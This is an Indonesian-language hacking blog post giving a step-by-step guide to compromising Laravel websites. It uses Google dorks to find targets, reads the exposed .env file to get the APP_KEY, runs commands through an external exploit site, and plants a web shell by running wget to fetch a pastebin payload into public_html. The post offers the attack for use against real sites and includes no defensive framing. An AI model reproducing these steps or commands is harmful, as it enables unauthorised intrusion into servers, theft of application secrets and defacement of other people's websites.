Laravel RCE With Appkey

lyxa-gov Juli 12, 2020

- Laravel RCE With Appkey
Pertama Kita Harus Dorking Di Google

Dork :
inurl:/vendor/phpunit/
intitle:index of /vendor/phpunit/

Setelah Kalian Mendapatkan Web Target Kalian Langsung Pergi Mengarah Kesini
site.com/.env

Lalu Kalian Baca Di Bagian APP_KEY=
Kalian Copy Isi Dari APP_KEY="isinya"

Seperti Ini Misalnya : APP_KEY=base64:k96Zwfo4/LEF3JmeI9pnEQgVukFwGC+OOrxQ8kpO9/g=
Jika Sudah Kalian Pergi Ke Website Ini : https://exploit.anons79.com/

Lalu Pastekan Target Dan APP_KEY nya Lalu Untuk Commandnya Kalian Masukkan Command Seperti Di Linux : ls/cd/pwd/whoami Ataupun Apa Disini Saya Tes Dengan Command whoami Apabila Muncul Nama User Berarti VULN!! Tapi Apabila Muncul Bacaan NOT VULN ya Gak Vuln


Ok Disini Saya Test Dengan Command whoami Dan Muncul Nama Username Ok Setelah Itu Kalian Masukkan Command Seperti ini Untuk Mengetahui Nama Folder User :

cd /home/; ls


Ok Disini Kalian Bisa Liat Nama User Foldernya : ebaycred

Lalu Kalian Masuk Ke Folder ebaycred Dengan Command Seperti Ini :

cd /home/ebaycred/; ls

Dan Kita Liat Isi Dalamnya Lagi


Kalau Kalian Liat Disini Ada Folder Namanya public_html Ya Itu Biasanya Tempat Kayak Homepagenya Gitu, Kalian Masuk Pake Command Seperti Ini : cd /home/ebaycred/public_html/; ls


Nah Kalian Bisa Liat Disini Ada File Namanya index.php, Kita Langsung Upload Shell Saja Dengan Command Seperti Ini :
cd /home/NamaFolderUser/public_html/; wget https://pastebin.com/ECstNap8 -O lyxa.php

Jika Sudah Kita Langsung Akses site.com/lyxa.php


Setelah Upload Shell? Bebas Kyaaaaaa >.<

Posting Komentar

0 Komentar

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618

lyxa-govSeptember 18, 2020

Microsoft Sql Server Remote Code Execution Vulnerability CVE-2020-0618 https://www.exploit-db.com/…

Baca selengkapnya